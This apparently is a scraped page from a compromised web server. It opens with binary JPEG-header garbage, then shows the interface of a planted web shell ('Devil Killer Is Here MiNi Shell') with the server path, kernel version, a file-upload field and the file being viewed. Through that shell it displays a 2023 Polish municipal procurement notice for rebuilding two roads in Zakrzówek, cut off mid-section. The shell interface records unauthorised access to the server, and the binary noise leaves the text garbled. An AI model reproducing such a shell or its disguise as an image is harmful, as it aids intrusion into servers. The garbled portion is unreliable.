JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231017/0044837001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej nr 108359L od km 0+000 do km 2+336 oraz przebudowa drogi gminnej nr 108357L od km 0+000 do km 0+380 w miejscowości Zakrzówek - Wieś </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZAKRZÓWEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020138</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Żeromskiego 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakrzówek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@zakrzowek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zakrzowek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej nr 108359L od km 0+000 do km 2+336 oraz przebudowa drogi gminnej nr 108357L od km 0+000 do km 0+380 w miejscowości Zakrzówek - Wieś </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-099e8d2c-69a5-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00448370</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00033249/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa drogi gminnej nr 108359L od km 0+000 do km 2+336 oraz przebudowa drogi gminnej nr 108357L od km 0+000 do km 0+380 w miejscowości Zakrzówek - Wieś</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/130935/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/130935/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób (w tym forma) przekazywania ośw. i dok.musi być zgodny z przep.wyd.na podstawie art. 70 PZP,<br/>tj. Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazyw. inf. oraz wymagań techn. dla dok. elektr. oraz środków komunik. elektr. w postęp.o<br/>udzielenie zamówienia publ. lub konkursie (Dz.U. poz. 2452). W zakresie nieuregulowanym w niniejszym SWZ zastosow. mają przepisy tego rozporządzenia.<br/>2. Zamaw.określa dopuszczalny format podpisu elektr., jako:<br/>a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>b) dopuszcza się podpisanie dok. w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podp. dokumentu,<br/>oddzielny plik z podpisem.<br/>c) Zamaw. zaleca, aby w przypadku podp. pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić<br/>do problemów w weryfikacji plików.<br/>3. Zamaw., określa niezb. wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>– Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>– Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>– Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>– Włączona obsługa JavaScript;<br/>– Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>4. Zamaw. określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie podpisu elektronicznego:<br/>a) Przeglądarka internetowa Microsoft Edge, Chrome, Firefox w wersji wspieranej przez producenta. Rekomendowaną przeglądarką do złożenia oferty podpisanej elektr. jest Firefox w wersji wpieranej<br/>przez producenta.<br/>b) Uruchomienie oprogramow.do skł. podpisu wymaga również zainstalow. Java (licencja EPL) w wersji OpenJDK 8 lub Java (licencja Oracle) w wersji 1.8.0_202 32 bitowej oraz 64 bitowej, pozwalające<br/>na przyjmow. przez użytkownika sesyjnych plików cookie oraz obsł. szyfrowanie. Konieczne jest również dod. adresu witryny platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list)<br/>w Javie. Uwaga: wymaga to uprawnień administr. na komputerze.<br/>c) Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę funkcj. podp.elektr. w platformie eZamawiający. Po zainstalowaniu rozszerzenia Szafir SDK oraz<br/>aplikacji Szafir Host należy przeładować bieżącą stronę.<br/>d) Przed uruch. platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą kryptograficzną do komputera.<br/>5. Informacje dot. odpow. przygotowania stanowiska znajdą Państwa na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>6. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv,jpg,jpeg,tif,tiff,geotiff,png,svg,wav,mp3,avi,mpg,mpeg,mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,xhtml,css,xml,xsd,gml,rng,xsl,xslt,tsl,xmlsig,xades,pades,cades,asic,asics,sig,xmlenc,dxf,ath,prd.<br/>7. Wśród formatów powszechnych a NIE występujących w Rozp. Rady Ministrów w spr. Krajowych Ram Interoperacyjności, min. wymagań dla rejestrów publ. i wymiany inf. w postaci elektr. oraz<br/>minimalnych wymagań dla syst.teleinformatycznych (Dz.U. z 2017 r. poz. 2247) nie znajdują się: .rar .gif .bmp .numbers .pages. dok.złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>8. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>– Plik załączony przez Wyk. na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamaw. po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych osobowych. <br/><br/>Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej RODO, informuję, iż:<br/><br/>1.	Administratorem Państwa danych osobowych jest Gmina Zakrzówek, ul. Żeromskiego 24, 23-213 Zakrzówek, adres e-mail: gmina@zakrzowek.pl, nr tel. 81 821 50 02.<br/>2.	Kontakt z wyznaczonym Inspektorem Ochrony Danych w sprawach dotyczących przetwarzania Państwa danych osobowych oraz realizacji przysługujących Państwu praw związanych z ich przetwarzaniem możliwy jest pod adresem e-mail: iod@data partners.pl.<br/>3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn: „Przebudowa drogi gminnej nr 108359L od km 0+000 do km 2+336 oraz przebudowa drogi gminnej nr 108357L od km 0+000 do km 0+380 w miejscowości Zakrzówek-Wieś” prowadzonego w trybie podstawowym bez negocjacji.<br/>4.	Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie art. 18 oraz art. 74 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej: „Ustawa Pzp”) oraz podmioty, z którymi zawarto umowy powierzenia przetwarzania danych osobowych.<br/>5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, dane osobowe przechowywane będą przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>6. Posiadają Państwo:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>– na podstawie art. 16 RODO prawo do sprostowania danych osobowych Państwa dotyczących*;<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych**; <br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą ul. Stawki 2, 00-193 Warszawa, gdy Państwo uznają, że przetwarzanie danych osobowych dotyczących Państwa narusza przepisy RODO.<br/>7.	Nie przysługuje Państwu:<br/>– w związku z art. 17 RODO prawo do usunięcia danych osobowych;<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8.	Podanie przez Państwa danych osobowych jest niezbędne do przeprowadzenia postępowania o udzielenie zamówienia publicznego. Niepodanie danych osobowych wyłącza możliwość udziału w wyżej wymienionym postępowaniu. <br/><br/>*Wyjaśnienie: skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>**Wyjaśnienie: w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.16.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie jest dofinansowane z Rządowego Funduszu Rozwoju Dróg. Zamówienie obejmuje: przebudowę drogi gminnej nr 108359L od km 0+000 do km 2+336 oraz przebudowę drogi gminnej nr 108357L od km 0+000 do km 0+380 w miejscowości Zakrzówek-Wieś.<br/><br/>Zakres robót obejmuje:<br/>Dane podstawowe:<br/>–	Drogi gminne publiczne klasy D,<br/>–	Kategoria ruchu - KR1,<br/>–	Grupa nośności podłoża gruntowego– G3<br/><br/>Zaprojektowano jezdnię o parametrach:<br/>droga gminna 108359L:<br/>–	szerokość jezdni – 4,5-5,0 (na łukach poszerzenia, patrz rys nr 2)<br/>–	szerokość pobocza – 0,75m,<br/>–	pochylenie poprzeczne jezdni – 2% daszkowe, (na łukach jednostronne, patrz rys nr 2)<br/>–	pochylenie poprzeczne pobocza – 8%<br/><br/>droga gminna 108357L:<br/>–	szerokość jezdni – 3,5m, (5,0 na mijankach),<br/>–	szerokość pobocza – 0,75m,<br/>–	pochylenie poprzeczne jezdni – 2% daszkowe,<br/>–	pochylenie poprzeczne pobocza - 8%<br/><br/>Profil podłużny - Ukształtowanie wysokościowe dostosowano do istniejącej niwelety terenu.<br/><br/>Przekroje konstrukcyjne<br/>Zaprojektowano następującą konstrukcję:<br/>droga gminna 108359L od km 0+000 do km 0+850 szerokość jezdni 4,5m+poszerzenia na łukach:<br/>–	4cm w-wa ścieralna z BA (AC11S), wg WT-2 2016<br/>–	5cm w-wa wiążąca z BA (AC11W), wg WT-2 2016<br/>–	~5cm w-wa wyrównawcza z BA (AC11W), wg WT-2 2016<br/><br/>Opis :<br/>–	wykonanie poszerzenia istniejącej jezdni do szerokości minimum 4,5m (lokalnie więcej na poszerzeniach przy łukach poziomych), składającej się z:<br/>o	wykonanie koryta o głębokości 40cm,<br/>o	wykonanie w-wy mrozoochronnej z mieszanki związanej cementem C1,5/2 gr. 22cm,<br/>o	wykonanie w-wy podbudowy z kruszywa łamanego C90/3 o gr. 20cm,<br/>–	wykonanie w-w bitumicznych (wyrównawcza – średnio 5cm, wiążąca – 5cm i ścieralna – 4cm) na całej szerokości jezdni,<br/>–	wykonanie obustronnych poboczy z kruszywa łamanego o szerokości 0,75m (lokalnie zwężone do 0,5m),<br/>–	wykonanie cieku liniowego (KPED 01.03) po napływowej (lewej) stronie na odcinku<br/>–	od km 0+310 do km 0+520 na ławie betonowej z oporem z betonu C12/15,<br/>–	wykonanie barier energochłonnych o parametrach N2W2A,<br/>–	wykonanie regulacji istniejących zjazdów kruszywem łamanym dostosowując je do nowej niwelety,<br/>–	odmulenie/odtworzenie istniejących rowów przydrożnych i przebudowa przepustów pod koroną drogi<br/><br/><br/>droga gminna 108359L od km 0+850 do km 2+336 szerokość jezdni 5,0m+poszerzenia na łukach:<br/>–	4cm w-wa ścieralna z BA (AC11S), wg WT-2 2016<br/>–	5cm w-wa wiążąca z BA (AC11W), wg WT-2 2016<br/>–	10+7cm w-wa wyrównawcza z kruszywa 0-31, wg WT-4 2014<br/><br/>Opis:<br/>–	wykonanie poszerzenia istniejącej jezdni do szerokości 5,0m, składającej się z:<br/>o	wykonanie koryta o głębokości 30cm<br/>o	wykonanie w-wy mrozoochronnej z mieszanki związanej cementem C1,5/2 gr. 22cm,<br/>o	wykonanie w-wy podbudowy z kruszywa łamanego C90/3 o gr. 10cm<br/>–	likwidacja lokalnie występujących przełomów poprzez wykonanie nowej konstrukcji jezdni takiej jak na poszerzeniach,<br/>–	wykonanie w-wy wyrównawczej o grubości 7cm z kruszywa łamanego C90/3 na całej szerokości jezdni,<br/>–	wykonanie w-wy wzmacniającej o grubości 10cm z kruszywa łamanego C90/3 na całej szerokości jezdni,<br/>–	wykonanie w-w bitumicznych (wiążąca – 5cm i ścieralna – 4cm) na całej szerokości jezdni, <br/>–	wykonanie obustronnych poboczy z kruszywa łamanego o szerokości 0,75m (lokalnie zwężone do 0,5m),<br/>–	wykonanie regulacji istniejących zjazdów kruszywem łamanym dostosowując je do nowej niwelety,<br/>–	odmulenie/odtworzenie istniejących rowów przydrożnych i przebudowa przepustów pod koroną drogi<br/><br/>Dodatkowo:<br/>Istniejące przepusty pod koroną drogi zostaną wymienione na nowe żelbetowe o takich samych średnicach oraz długościach, przepusty zostaną zabezpieczone przyczółkami żelbetowymi. Zestawienie przepustów do przebudowy przedstawia się następująco:<br/>–	km 0+307 przepust o średnicy 80cm – długość 9mb<br/>–	km 1+008 przepust o średnicy 100cm – długość 9mb<br/>–	km 1+247 przepust o średnicy 80cm – długość 9mb<br/>–	km 1+520 przepust o średnicy 80cm – długość 10mb<br/>–	km 1+849,5 przepust o średnicy 80cm – długość 9mb<br/><br/>Zaprojektowano bariery energochłonne o parametrach N2W2a na następujących odcinkach:<br/>–	str. prawa km 0+122 – 0+342 → 220mb<br/>–	str. prawa km 0+354 – 0+574 → 220mb<br/>–	str. prawa km 1+506 – 1+530 → 24mb<br/><br/>W celu ochrony zarówno krawędzi jezdni jak i skarpy po stronie napływowej zaprojektowano odcinki cieków liniowych za poboczem o szerokości 0,5m wykonanych z elementów prefabrykowanych zgodnych z KPED 01.03. Odcinki cieków liniowych:<br/>–	km 0+184 – 0+316 → 132mb<br/>–	km 0+455 – 0+520 → 65mb<br/><br/>Ponadto należy wykonać:<br/>–	Roboty pomiarowe, rozbiórkowe. <br/>–	Wykonanie regulacji zjazdów kruszywem łamanym, dostosowując je do nowej niwelety.<br/>–	Regulacja zjazdów z kostki brukowej.<br/>–	Wykonanie oznakowania zgodnie z zatwierdzoną stałą organizacją ruchu. <br/>–	Wymiana przepustów pod zjazdami (fi 50 – 60 szt. x 6 m) wraz ze ściankami prefabrykowanymi.<br/>–	Karczowanie zakrzaczeń i podcinka gałęzi na całej długości drogi.<br/>–	Ścinanie i karczowanie pniaków – 11 szt.<br/>–	Nasadzenia zastępcze w ilości 11 szt. – gatunek lipa (sadzonki na wys. 1 m muszą posiadać min. 5 cm obwodu)<br/><br/><br/>droga gminna nr 108357L na odcinku 380mb<br/>–	4cm w-wa ścieralna z BA (AC11S), wg WT-2 2016<br/>–	5cm w-wa wiążąca z BA (AC11W), wg WT-2 2016<br/>–	20cm w-wa podbudowy z kruszywa 0-31, wg WT-4 2014<br/>–	22cm w-wa mrozoochronna z mieszanki związanej cementem C1,5/2<br/><br/>Opis:<br/>–	rozbiórka istniejącej konstrukcji drogi z płyt drogowych 3x1(lokalnie 3x1,5m)<br/>–	wykonanie nowej konstrukcji jezdni o szerokości 3,5m (lokalnie 5m na mijankach). składającej się z:<br/>o	wykonanie koryta o głębokości 40cm wraz z jego profilowaniem i zagęszczeniem<br/>o	wykonanie w-wy mrozoochronnej z mieszanki związanej cementem C1,5/2 gr. 22cm,<br/>o	wykonanie w-wy podbudowy z kruszywa łamanego C90/3 o gr. 20cm<br/>o	w-wy wiążącej AC11W grubości 5cm<br/>o	w-wy ścieralnej AC11S grubości 4cm<br/>–	wykonanie obustronnych poboczy z kruszywa łamanego o szerokości 0,75m (lokalnie zwężone do 0,5m),<br/>–	wykonanie regulacji istniejących zjazdów kruszywem łamanym dostosowując je do nowej niwelety,<br/><br/>Ponadto należy wykonać:<br/>–	Roboty pomiarowe, rozbiórkowe. <br/>–	Wykonanie regulacji zjazdów kruszywem łamanym, dostosowując je do nowej niwelety.<br/>–	Wykonanie oznakowania zgodnie z zatwierdzoną stałą organizacją ruchu. <br/>–	Karczowanie zakrzaczeń i podcinka gałęzi na całej długości drogi.<br/>–	Ścinanie i karczowanie pniaków – 4 szt.<br/><br/>Szczegółowy opis zamówienia zawierają materiały do zgłoszenia robot budowlanych będących załącznikiem nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233280-5 - Wznoszenie barier drogowych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) 